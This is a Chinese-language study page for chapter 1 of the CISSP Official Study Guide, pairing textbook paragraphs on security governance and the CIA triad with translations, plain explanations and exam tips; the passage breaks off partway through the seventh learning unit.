单文件 · 无点击加载 · 直接滚动阅读

OSG10 全文精读画报版

这个版本不再依赖“点击加载章节”,所有 21 章内容已经直接放在同一个 HTML 页面里。手机打开后可以直接滚动阅读,章节目录只是跳转到对应位置。

21个章节
1491个连续学习单元
4格原文 / 直译 / 小白解释 / 考点
第 1 章 · P78-138 · 61 个学习单元

通过原则和政策实现安全治理

OSG10 · Chapter 1 · Security Governance Through Principles and Policies · 全文覆盖 + 小白精读 + 画报

第 1 章:通过原则和政策实现安全治理

这不是提炼版。本页按 PDF 第 78-138 页连续覆盖第 1 章内容,每个学习单元都包含教材原文段落、PDF 中文直译/整理、小白解释、考点提醒和对应画报。

61个连续学习单元
4格原文 / 直译 / 解释 / 考点
61页覆盖第1章正文与章末练习
小白先讲人话,再做题
学习单元 01 / PDF P78

本章考试范围总览

先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

教材原文段落

THE CISSP TOPICS COVERED IN THIS CHAPTER INCLUDE: Domain 1.0: Security and Risk Management 1.2 Understand and apply security concepts 1.2.1 Confidentiality, integrity, and availability, authenticity, and nonrepudiation (5 Pillars of Information Security) 1.3 Evaluate and apply security governance principles 1.3.1 Alignment of the security function to business strategy, goals, mission, and objectives 1.3.2 Organizational processes (e.g., acquisitions, divestitures, governance committees) 1.3.3 Organizational roles and responsibilities 1.3.4 Security control frameworks (e.g., International Organization for Standardization (ISO), National Institute of Standards and Technology (NIST), Control Objectives for Information and Related Technology (COBIT), Sherwood Applied Business Security Architecture (SABSA), Payment Card Industry (PCI), Federal Risk and Authorization Management Program (FedRAMP)) 1.3.5 Due care/due diligence 1.6 Develop, document, and implement security policy, standards, procedures, and guidelines 1.10 Understand and apply threat modeling concepts and methodologies 1.11 Apply supply chain risk management (SCRM) concepts 1.11.1 Risks associated with the acquisition of products and services from suppliers and providers (e.g., product tampering, counterfeits, implants) 1.11.2 Risk mitigations (e.g., third-party assessment and monitoring, minimum security requirements, service level requirements, silicon root of trust, physically unclonable function, software bill of materials) Domain 3.0 Security Architecture and Engineering

中文直译 / 整理

本章涵盖的CISSP主题包括: 领域1.0:安全与风险管理 1.2 理解并应用安全概念 1.2.1 机密性、完整性、可用性、真实性与不可否认性性(信息安全五大 支柱) 1.3 评估并应用安全治理原则 1.3.1 安全职能与业务战略、目标、使命和目标的对齐 1.3.2 组织流程(例如,收购、剥离、治理委员会) 1.3.3 组织角色与职责 1.3.4 安全控制框架(例如,国际标准化组织(ISO)、 美国国家标准与技术研究院(NIST)、信息及相关技术控制 目标(COBIT)、谢伍德应用业务安全架构(SABSA)、支 付卡行业(PCI)、联邦风险与授权管理计划(FedRAMP)) 1.3.5 应有的注意/应有的谨慎 1.6 制定、记录并实施安全政策、标准、流程和指南 1.10 理解并应用威胁建模概念和方法 1.11 应用供应链风险管理(SCRM)概念 1.11.1 从供应商和提供商处采购产品和服务相关的风险(例如, 产品篡改、假冒、植入物) 1.11.2 风险缓解措施(例如,第三方评估与监控、最低安全要求、服 务级别 要求、硅信任根、物理不可克隆功能、软件物料清单 SBOM) 第3.0域:安全架构与工程

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:先知道本章会覆盖哪些考试目标,后面每个概念才知道放在哪个知识域。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

安全治理:治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“本章考试范围总览”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 governance,优先想高层责任、业务目标、策略、监督和持续改进。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

证书、签名、强认证常支持真实性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
安全治理 治理负责定方向、定责任、定监督方式。它不是配置防火墙,而是决定组织为什么要做安全、由谁负责、做到什么程度。
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
真实性 真实性确认数据、身份或来源是真的,不是假冒的。
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
授权 授权是认证之后决定你能访问什么、能做什么。
业务战略对齐 安全要支持组织使命和目标,而不是单独追求技术完美。
学习单元 02 / PDF P79

安全入门:安全为什么是业务问题

安全不是技术部门自嗨,而是帮助组织在风险中继续运营。

教材原文段落

3.1 Research, implement, and manage engineering processes using secure design principles 3.1.1 Threat modeling 3.1.3 Defense in depth The Security and Risk Management domain encompasses many of the foundational elements of security solutions. Additional elements of this domain are discussed in various chapters: Chapter 2, “Personnel Security and Risk Management Concepts” Chapter 3, “Business Continuity Planning” Chapter 4, “Laws, Regulations, and Compliance” Chapter 19, “Investigations and Ethics” Please review all these chapters to have a complete perspective on the topics of this domain. Security 101 We often hear how important security is, but we don't always understand why.

Security is essential because it helps to ensure that an organization can continue to exist and operate despite any attempts to steal its data or compromise its physical or logical elements. Security is an element of business management rather than only an IT concern. Furthermore, IT and security are different. Information technology (IT) or even information systems (IS) is the hardware and software that support the operations or functions of a business. Security is the business management tool that ensures the reliable and protected operation of IT/IS. Security exists to support the organization's objectives, mission, and goals.

Generally, a security framework that provides a starting point for implementing security should be adopted. Once security is initiated, finetuning that security is accomplished through continuous evaluation and stress testing. There are three common types of security evaluation: risk assessment, vulnerability assessment, and penetration testing (these are covered in detail in Chapter 2 and Chapter 15, “Security Assessment and Testing”). Risk assessment is identifying assets, threats, and vulnerabilities to 3.1

中文直译 / 整理

使用安全设计原则研究、实现和管理工程流程 3.1.1 威胁 建模 3.1.3 深度防御 安全与风险管理领域涵盖了安全解决方案的许多基础要素。 本领域的其他 要素将在以下各章中讨论: 第2章,“人员安全与风险管理概念” 第3章,“业务连续性规划” 第4章,“法律、法规与合规” 第19章,“调查与伦理” 请查阅所有这些章节,以全面了解本领域的主题。 安全入门 我们经常听到安全的重要性,但并不总是理解其原因。 安全至关重要,因为它 有助于确保组织在面对任何窃取其数据或破坏其物理或逻辑元素的企图时,仍 能持续存在和运营。 安全是业务管理的一个组成部分,而不仅仅是IT问题。 此 外,IT和安全是不同的。 信息技术(IT)甚至信息系统(IS)是指支持企业运 营或功能的硬件和软件。 安全是一种业务管理工具,用于确保IT/IS的可靠和 受保护运行。 安全的存在是为了支持组织的目标、使命和愿景。 通常,应采用一个为实施安全提供起点的安全框架。 一旦启动安全措施,便通 过持续评估和压力测试来实现安全的精细化调整。 常见的安全评估有三种:风 险评估、漏洞评估和渗透测试(这些内容将在第2章和第15章“安全评估与测试” 中详细讨论)。

风险评估是识别资产、威胁和漏洞以

小白解释

场景先行:你是公司的安全负责人,正在读第 79 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:安全不是技术部门自嗨,而是帮助组织在风险中继续运营。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

安全入门:本节先把安全放回业务语境:安全不是 IT 自己的事,而是保证组织继续运营的管理工具。

风险评估:风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。

漏洞评估:漏洞评估偏技术扫描,主要找已知弱点。

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全入门:安全为什么是业务问题”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

管理题少选直接上技术,先看业务目标、风险、成本和法律责任。

风险评估不是漏洞扫描;它更高层,服务于决策和资源分配。

自动化扫描、已知弱点、补洞通常对应 vulnerability assessment。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

多层控制串联、避免单点失败,就是 defense in depth。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
安全入门 本节先把安全放回业务语境:安全不是 IT 自己的事,而是保证组织继续运营的管理工具。
风险评估 风险评估是先找资产、威胁、漏洞和影响,再决定控制措施。
漏洞评估 漏洞评估偏技术扫描,主要找已知弱点。
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
纵深防御 纵深防御不是一道门,而是一层又一层控制。
威胁建模 威胁建模是在设计和生命周期中提前识别威胁。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
渗透测试 渗透测试在授权范围内模拟攻击验证风险。
学习单元 03 / PDF P80

第 80 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

calculate risk. Once risk is understood, it is used to guide the improvement of the existing security infrastructure. Vulnerability assessment uses automated tools to locate known security weaknesses, which can be addressed by adding more defenses or adjusting the current protections. Penetration testing uses trusted teams to stress-test the security infrastructure to find issues that may not be discovered by the prior two means and to find those concerns before an adversary takes advantage of them. Security should be cost-effective. Organizations do not have infinite budgets and, thus, must allocate their funds appropriately.

Additionally, an organizational budget includes a percentage of monies dedicated to security, just as most other business tasks and processes require capital, not to mention payments to employees, insurance, retirement, etc. You should select security controls that provide the most significant protection for the lowest resource cost. Security should be legally defensible. The laws of your jurisdiction are the backstop of organizational security. When someone intrudes into your environment and breaches security, especially when such activities are illegal, prosecution in court may be the only available response for compensation or closure.

Also, many decisions made by an organization will have legal liability issues. If required to defend a security action in the courtroom, legally supported security will go a long way toward protecting your organization from facing significant fines, penalties, or charges of negligence. Security is a journey, not a finish line. It is not a process that will ever be concluded. It is impossible to fully secure something because security issues are always changing. Our deployed technology is changing with the passage of time, by users' activities, and by adversaries discovering flaws and developing exploits. The defenses that were sufficient yesterday may not be sufficient tomorrow.

As new vulnerabilities are discovered, new means of attack are crafted, and new exploits are built, we have to respond by reassessing our security infrastructure and responding appropriately. Understand and Apply Security Concepts Security management concepts and principles are inherent elements in a security policy and solution deployment. They define the basic parameters needed for a secure environment. They also define the goals and objectives that both policy designers and system implementers must achieve to create a secure solution.

中文直译 / 整理

计算风险。 一旦理解了风险,便可利用它来指导现有安全基础设施的改进。 漏 洞评估使用自动化工具定位已知的安全弱点,这些弱点可以通过增加更多防御 措施或调整现有保护来解决。 渗透测试则依靠可信赖的团队对安全基础设施进 行压力测试,以发现前两种方法可能遗漏的问题,并在攻击者利用这些漏洞之 前将其识别出来。 安全性应具有成本效益。 组织的预算并非无限,因此必须合理分配资金。 此外,组织预算中包含一定比例用于安全的资金,正如大多数其他业务任务和 流程都需要资本投入一样,更不用说员工薪酬、保险、退休金等开支了。 您应 选择能够以最低资源成本提供最大保护的安全控制措施。 安全性应具有法律可辩护性。 您所在司法管辖区的法律是组织安全的最后保障。 当有人入侵您的环境并破坏安全时,尤其是当此类行为属于非法时,法庭诉讼 可能是唯一可用的补偿或终结手段。 此外,组织所做的许多决策都涉及法律责 任问题。 如果需要在法庭上为安全措施辩护,合法支持的安全措施将大大有助 于保护您的组织,避免面临巨额罚款、处罚或疏忽指控。 安全是一段旅程,而非终点。 它不是一个会最终完成的过程。 由于安全问题始 终在变化,因此不可能完全实现安全。

我们部署的技术随着时间推移、用户活 动以及攻击者发现漏洞并开发利用手段而不断变化。 昨天足够的防御措施,明 天可能就不够了。 随着新漏洞的发现、新型攻击手段的出现以及新利用方式的 构建,我们必须重新评估安全基础设施并做出相应响应。 理解并应用安全概念 安全管理概念和原则是安全策略和解决方案部署中的固有元素。 它们定义了创 建安全环境所需的基本参数,同时也定义了策略设计者和系统实施者必须实现 的目标和目的,以构建安全的解决方案。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

漏洞评估:漏洞评估偏技术扫描,主要找已知弱点。

渗透测试:渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。

成本效益:安全控制不能无限堆钱,要用合理成本降低最重要的风险。

法律可辩护:安全动作要能在审计、监管或法庭上解释清楚,有授权、有记录、有依据。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 80 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

自动化扫描、已知弱点、补洞通常对应 vulnerability assessment。

渗透测试通常比漏洞扫描更深入,但也更需要授权和范围控制。

CISSP 喜欢考成本收益:控制成本不应明显超过被降低的风险价值。

调查、监控、处罚、取证题先看合法授权、政策和证据链。

Policy 高层、强制、稳定;Procedure 具体步骤。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
漏洞评估 漏洞评估偏技术扫描,主要找已知弱点。
渗透测试 渗透测试让可信团队模拟攻击,验证真实防护能不能扛住。
成本效益 安全控制不能无限堆钱,要用合理成本降低最重要的风险。
法律可辩护 安全动作要能在审计、监管或法庭上解释清楚,有授权、有记录、有依据。
政策 政策是高层原则,说明必须遵守什么。
渗透测试 渗透测试在授权范围内模拟攻击验证风险。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 04 / PDF P81

五大支柱与 CIA 三元组

先把安全目标分成机密性、完整性、可用性,再理解真实性和不可否认性。

教材原文段落

The 5 Pillars of Information Security are confidentiality, integrity, availability, authenticity, and nonrepudiation. The first three of these, namely confidentiality, integrity, and availability, are so commonly discussed as a group they have been labeled with their own phrase, the CIA Triad. The elements of the CIA Triad are often perceived as the primary goals and objectives of a security infrastructure (see Figure 1.1). FIGURE 1.1 The CIA Triad Security controls are typically evaluated on how well they address these three core information security tenets. Vulnerabilities and risks are also evaluated based on the threat they pose against one or more of the CIA Triad principles.

Confidentiality The first principle of the CIA Triad is confidentiality. Confidentiality is the concept of the measures used to ensure the protection of the secrecy of data, objects, or resources. The goal of confidentiality protection is to prevent or

中文直译 / 整理

信息安全的五大支柱是机密性、完整性、可用性、真实性和不可否认性性。 其中 前三个,即机密性、完整性和可用性,由于经常被作为一个整体讨论,已被赋 予了专门的术语——CIA三元组。 CIA三元组的元素通常被视为安全基础设施的 主要目标和目的(见图1.1)。 图 1.1 CIA 三元组 安全控制通常根据其在多大程度上解决这三个核心信息安全原则进行评估。 漏 洞和风险也根据其对 CIA 三元组原则中一个或多个原则构成的威胁进行评估。 机密性 CIA三原则的第一条是机密性。 机密性是指用于确保数据、对象或资源机密性 保护措施的概念。 机密性保护的目标是防止或

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:先把安全目标分成机密性、完整性、可用性,再理解真实性和不可否认性。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

CIA 三元组:机密性、完整性、可用性是安全目标的三根主梁。

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

可用性:可用性保证授权用户需要时能及时使用系统和数据。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“五大支柱与 CIA 三元组”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

泄露看机密性,篡改看完整性,中断/不可访问看可用性。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

冗余、备份、BCP/DRP、抗 DoS、容量规划都对应可用性。

证书、签名、强认证常支持真实性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
CIA 三元组 机密性、完整性、可用性是安全目标的三根主梁。
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
可用性 可用性保证授权用户需要时能及时使用系统和数据。
真实性 真实性确认数据、身份或来源是真的,不是假冒的。
不可否认性 不可否认性让行为人事后不能抵赖自己做过某事。
学习单元 05 / PDF P82

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

minimize unauthorized access to data. Confidentiality protections prevent disclosure while protecting authorized access. Violations of confidentiality are not limited to directed intentional attacks. Many instances of unauthorized disclosure of sensitive or confidential information are the result of human error, oversight, or ineptitude. Confidentiality violations can result from the actions of an end user or a system administrator. They can also occur because of an oversight in a security policy or a misconfigured security control. Numerous countermeasures can help ensure confidentiality against possible threats.

These include encryption, network traffic padding, strict access control, rigorous authentication procedures, data classification, and extensive personnel training. Concepts, conditions, and aspects of confidentiality include the following: Sensitivity Sensitivity refers to the quality of information that could cause harm or damage if disclosed. Discretion Discretion is a decision where an operator can influence or control disclosure to minimize harm or damage. Criticality The level to which information is mission critical is its measure of criticality. The higher the level of criticality, the more likely the need to maintain the confidentiality of the information.

Concealment Concealment is the act of hiding or preventing disclosure. Concealment is often viewed as a means of cover, obfuscation, or distraction. A related concept to concealment is security through obscurity, which attempts to gain protection through hiding, silence, or secrecy. Secrecy Secrecy is the act of keeping something a secret or preventing the disclosure of information. Privacy Privacy refers to keeping information confidential that is personally identifiable or that might cause harm, embarrassment, or disgrace to someone if revealed. Seclusion Seclusion involves storing something in an out-of-the-way location, likely with strict access controls.

Isolation Isolation is the act of keeping something separated from others.

中文直译 / 整理

最小化对数据的未授权访问。 机密性保护措施可防止信息泄露,同时保障授权 访问。 机密性违规行为不仅限于有目的的故意攻击。 许多敏感或机密信息的未经授 权泄露是由于人为错误、疏忽或无能造成的。 机密性违规可能由最终用户或系统管理员的行为引起。 也可能由于安全策 略中的疏忽或安全控制配置错误而发生。 许多应对措施有助于确保针对潜在威胁的机密性。 这些措施包括加密、网络流 量填充、严格的访问控制、严密的认证程序、数据分类以及全面的人员培训。 机密性的概念、条件和方面包括以下内容: 敏感性 敏感性 指的是如果被披露可能造成损害或伤害的信息的特性。 自主裁量 自主裁量 是指操作员可以影响或控制披露,以最小化损害或伤害的决策。 重要性 信息对任务的关键程度是其重要性的衡量标准。 重要性越高,保持 信息机密性的需求就越可能增加。 隐蔽 隐蔽 是指隐藏或阻止披露的行为。 隐蔽常被视为一种掩护、混淆或 分散注意力的手段。 与隐蔽相关的概念是通过隐蔽实现安全,它试图通 过隐藏来获得保护, 沉默或保密。 保密 保密 是指将某事物保密或防止信息泄露的行为。 隐私 隐私 指的是保护个人身份信息或可能因泄露而给他人带来伤害、 尴尬或耻辱的信息的机密性。

隔离 隔离 涉及将某物存放在偏僻的位置,通常伴有严格的访问控制。 隔离 隔离 是将某事物与其他事物分隔开来的行为。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

ISO 偏标准和管理体系。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
标准 标准给出必须满足的最低要求。
学习单元 06 / PDF P83

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

Organizations should evaluate the nuances of confidentiality they wish to enforce. Tools and technology that implement one form of confidentiality might not support or allow other forms. Integrity Integrity is the concept of protecting the reliability and correctness of data. Integrity protection prevents unauthorized alterations of data. Properly implemented integrity protection provides a means for authorized changes while protecting against intended and malicious unauthorized activities (such as viruses and intrusions) and mistakes made by authorized users (such as accidents or oversights).

Integrity can be examined from three perspectives: Preventing unauthorized subjects from making modifications Preventing authorized subjects from making unauthorized modifications, such as mistakes Maintaining the internal and external consistency of objects so that their data is a correct and true reflection of the real world and any relationship with any other object is valid, consistent, and verifiable For integrity to be maintained on a system, controls must be in place to restrict access to data, objects, and resources. Maintaining and validating object integrity across storage, transport, and processing requires numerous variations of controls and oversight.

Numerous attacks focus on the violation of integrity. These include viruses, logic bombs, unauthorized access, errors in coding and applications, malicious modification, intentional replacement, and system backdoors. Human error, oversight, or ineptitude accounts for many instances of unauthorized alteration of sensitive information. They can also occur because of an oversight in a security policy or a misconfigured security control. Numerous countermeasures can ensure integrity against possible threats.

These include strict access control, rigorous authentication procedures, intrusion detection systems, object/data encryption, hash verifications (see Chapter 6, “Cryptography and Symmetric Key Algorithms,” and Chapter 7, “PKI and Cryptographic Applications”), interface restrictions, input/function checks, and extensive personnel training.

中文直译 / 整理

组织应评估其希望实施的机密性的细微差别。 实现某种保密形式的工具和 技术可能不支持或不允许其他形式。 完整性 完整性是保护数据可靠性和正确性的概念。 完整性保护防止数据被未经授权的 修改。 正确实施的完整性保护在允许授权修改的同时,防范有意或恶意的未经 授权行为(如病毒和入侵)以及授权用户所犯的错误(如意外或疏忽)。 完整性可以从三个角度进行考察: 防止未经授权的主体进行修改 防止授权主体进行未经授权的修改,例如错误 保持对象的内部和外部一致性,使其数据正确真实地反映现实世界及其任何关系 与任何其他对象的交互都是有效、一致且可验证的 为维持系统的完整性,必须实施控制措施以限制对数据、对象和资源的访问。 在存储、传输和处理过程中维持并验证对象的完整性,需要多种控制和监督 机制。 许多攻击都针对完整性被破坏的情况,包括病毒、逻辑炸弹、未经授权的访 问、编码和应用程序错误、恶意修改、故意替换以及系统后门。 人为错误、疏忽或无能是导致敏感信息被未经授权修改的许多原因。 它们也可 能因安全策略的疏漏或安全控制配置不当而发生。 众多防护措施可确保抵御潜在威胁的完整性。

这些措施包括严格的访问控制、 严谨的认证流程、入侵检测系统、对象/数据加密、哈希验证(参见第6章, “加密学与对称密钥算法”)和第7章,“PKI与加密应用”)、接口限制、 输入/功能检查以及全面的人员培训。

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

机密性:机密性让该看的人能看,不该看的人看不到。

完整性:完整性保证数据没有被未授权修改,并且仍然正确可信。

认证:认证是验证“你是不是你声称的那个人”。

授权:授权是认证之后决定你能访问什么、能做什么。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

密码、令牌、生物特征、多因素认证都服务认证。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
认证 认证是验证“你是不是你声称的那个人”。
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
密码学 密码学用数学方法保护信息,常用于机密性、完整性、认证和不可否认性。
学习单元 07 / PDF P84

完整性:数据要正确、可信、未被乱改

完整性不只是防黑客篡改,也包括防授权用户误操作。

教材原文段落

Concepts, conditions, and aspects of integrity include the following: Accuracy: Being correct and precise Truthfulness: Being a true reflection of reality Validity: Being factually or logically sound Accountability: Being responsible or obligated for actions and results Responsibility: Being in charge or having control over something or someone Completeness: Having all necessary components or parts Comprehensiveness: Being complete in scope; the full inclusion of all needed elements Availability Availability means authorized subjects are granted timely and uninterrupted access to objects.

Often, availability protection controls support sufficient bandwidth and timeliness of processing as deemed necessary by the organization or situation. Availability includes efficient, uninterrupted access to objects and prevention of denial-of-service (DoS) attacks. Availability also implies that the supporting infrastructure—including network services, communications, and access control mechanisms—is functional and allows authorized users to gain access.

For availability to be maintained on a system, controls must be in place to ensure authorized access and an acceptable level of performance, to quickly handle interruptions, provide for redundancy, maintain reliable backups, and prevent data loss or destruction. There are numerous threats to availability. These include device failure, software errors, and environmental issues (heat, static electricity, flooding, power loss, and so on). Some forms of attack focus on the violation of availability, including DoS attacks, object destruction, and communication interruptions. Many availability breaches are caused by human error, oversight, or ineptitude.

They can also occur because of an oversight in a security policy or a misconfigured security control. Numerous countermeasures can ensure availability against possible threats. These include designing intermediary delivery systems properly, using access

中文直译 / 整理

完整性的概念、条件和方面包括以下内容: 准确性:正确且精确 真实性:真实反映现实 有效性:在事实或逻辑上成立 问责性:对行为和结果负责或有义务责任:对某事物或某人负有管理 或控制责任 完整性:具备所有必要组件或部分 全面性:在范围上完整; 包含所有内容 所需元素 可用性 可用性是指授权主体被及时且不间断地授予对对象的访问权限。 通常,可用性 保护控制措施会支持组织或情境所认为必要的足够带宽和处理及时性。 可用性 包括对对象的高效、不间断访问,以及防止拒绝服务(DoS)攻击。 可用性还 意味着支持基础设施——包括网络服务、通信和访问控制机制——处于正常运 行状态,允许授权用户获得访问。 为维持系统的可用性,必须实施控制措施,以确保授权访问和可接受的性能水 平,快速处理中断,提供冗余,维护可靠的备份,并防止数据丢失或破坏。 可用性面临诸多威胁,包括设备故障、软件错误和环境问题(如高温、静电、 洪水、断电等)。 某些攻击形式专门针对可用性的破坏,包括DoS攻击、对 象破坏和通信中断。 许多可用性漏洞是由人为错误、疏忽或无能造成的。 它们也可能因安全策略的 疏漏或安全控制配置不当而发生。 许多对策可以确保应对潜在威胁时的可用性。

这些包括正确设计中间传输系统、有 效使用访问

小白解释

